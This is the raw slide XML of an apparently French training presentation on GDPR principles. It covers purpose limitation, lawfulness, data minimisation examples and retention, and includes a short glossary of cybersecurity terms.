          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1499164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4B8AF-727A-EBFB-C23D-7B12B74A27C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0FB4DC5-B131-03FE-EDC3-17FD90AF07B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7743FCB-26D2-0EF2-6302-47D2B904707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55F6506-8C73-8069-3230-5C56BA35B034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B18B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3432320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4B8AF-727A-EBFB-C23D-7B12B74A27C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0FB4DC5-B131-03FE-EDC3-17FD90AF07B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7743FCB-26D2-0EF2-6302-47D2B904707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55F6506-8C73-8069-3230-5C56BA35B034}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B18B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="761296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FFB1EAC-BEE3-450C-8EEA-9B42598B1859}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31192673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RGPD prévoit que toute finalité soit déterminée, soit qu’un objectif précis à atteindre doit avoir été arrêté avant la mise en œuvre du traitement. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il est à la charge du responsable de traitement d’assurer que la finalité est formulée et partagée avec les personnes concernées et dans un langage compréhensible et clair.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les finalités de traitement suivantes sont-elles explicites ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recueillir les données des élèves </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Organiser la répartition des élèves par section </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyser la navigation des conducteurs automobiles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Faire de la publicité ciblée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Vidéo protection d’un salarié en continu </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Livraison à l’adresse du domicile d’un client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Calcul du taxe au regard de la situation économique d’un client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Géolocalisation des utilisateurs d’une application mobile de discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si la finalité est peu justifiée ou trop intrusive alors la légitimité peu être remise en cause. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La légitimité est FORTEMENT liée à l’activité de l’organisme responsable du traitement</a:t>
            </a:r>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40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2194512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RGPD prévoit que toute finalité soit déterminée, soit qu’un objectif précis à atteindre doit avoir été arrêté avant la mise en œuvre du traitement. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il est à la charge du responsable de traitement d’assurer que la finalité est formulée et partagée avec les personnes concernées et dans un langage compréhensible et clair.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Avis puis retour sur cette slide plus tard pour réévaluer après avoir vu l’intégralité des notions de la RGPD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si la finalité est peu justifiée ou trop intrusive alors la légitimité peu être remise en cause. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La légitimité est FORTEMENT liée à l’activité de l’organisme responsable du traitement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30722533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RGPD prévoit que toute finalité soit déterminée, soit qu’un objectif précis à atteindre doit avoir été arrêté avant la mise en œuvre du traitement. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il est à la charge du responsable de traitement d’assurer que la finalité est formulée et partagée avec les personnes concernées et dans un langage compréhensible et clair.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les finalités de traitement suivantes sont-elles explicites ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recueillir les données des élèves </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Organiser la répartition des élèves par section </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyser la navigation des conducteurs automobiles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Faire de la publicité ciblée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Vidéo protection d’un salarié en continu </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Livraison à l’adresse du domicile d’un client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Calcul du taxe au regard de la situation économique d’un client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Géolocalisation des utilisateurs d’une application mobile de discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si la finalité est peu justifiée ou trop intrusive alors la légitimité peu être remise en cause. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La légitimité est FORTEMENT liée à l’activité de l’organisme responsable du traitement</a:t>
            </a:r>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29611346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43</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38084516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44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35960185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Souscription d’un contrat d’assurance </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Un devis préalable doit être établi Etape préalable au contrat qui justifie la collecte de données à fins précontractuelles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Achat d’un produit sur Internet </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’exécution du contrat de vente oblige le commerçant à traiter les données relatives aux coordonnées de l’acheteur pour organiser la livraison </a:t>
            </a:r>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2702648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1BB39-7267-ADB8-E40F-3C4998D013E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02AEF7-72D1-0D87-4E90-83D0DDFCC20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89AE611-5F8E-EBE4-BC47-F907BDBE68B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cybersécurité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> mot « commercial » pour désigner la SSI (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sécurité des systèmes d'information) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> dans le privé &amp; civil ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cyberdéfense  Plus côté armée ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SSI  Sécurité des systèmes d’informations (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>nsemble de ressources, à la fois </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>humaines, matérielles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>immatérielles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> dont le rôle est de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>collecter, stocker, traiter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t>distribuer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> de l’information.) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  Mot professionnel pour désigner le hacking fait de façon légal.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F31C50-40B7-7170-945E-85EBE803E451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B18B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17226654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46</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6974168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47</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22372557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48</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9667919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49</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33182664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Exemple  1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ajouter un formulaire de contact sur un site internet d’une entreprise </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bonne question </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pourquoi ai-je besoin de collecter des données pour ce formulaire ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réponse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pouvoir répondre à la personne contact </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Données à collecter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Adresse email ou n° de téléphone, Nom et Prénom de la personne concernée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Exemple 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une entreprise souhaite renforcer la sécurité de ses locaux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Proposition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’entreprise envisage d’utiliser un système biométrique </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Alternatives </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Badges, code d’accès, gardiennage, vidéosurveillance, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Exemple 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>En cas d’accident, une association souhaite collecter les numéro de sécurité sociale des adhérents afin de faciliter la prise en charge </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réponse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La prise en charge est possible sans la collecte de cette donnée </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>LA COLLECTE EST INUTILE !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Exemple 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une entreprise souhaite obtenir des informations spécifiques sur les habitudes d’achat de ses clients </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réponse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’analyse statistique de données ne nécessite pas de traitement nominatif. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données sont à anonymiser ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pseudonymiser</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Exemple 5 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une entreprise souhaite obtenir des informations spécifiques sur les habitudes d’achat de ses clients </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réponse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’analyse statistique de données ne nécessite pas de traitement nominatif. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données sont à anonymiser ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pseudonymiser</a:t>
            </a:r>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50</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35208939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Que faire des données lorsque l’objectif de traitement est réalisé ou satisfait ?</a:t>
            </a:r>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51</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22844173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Respecter les obligations légales pour le RT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Pour aider les organismes à identifier les législations et réglementations applicables, plusieurs organismes propose des éléments de veille et des recommandations</a:t>
            </a:r>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10833008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53</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34435945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a:solidFill>
                  <a:srgbClr val="00292D"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Livrables attendus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dirty="0">
              <a:solidFill>
                <a:srgbClr val="00292D"/>
              </a:solidFill>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a:solidFill>
                  <a:srgbClr val="00292D"/>
                </a:solidFill>
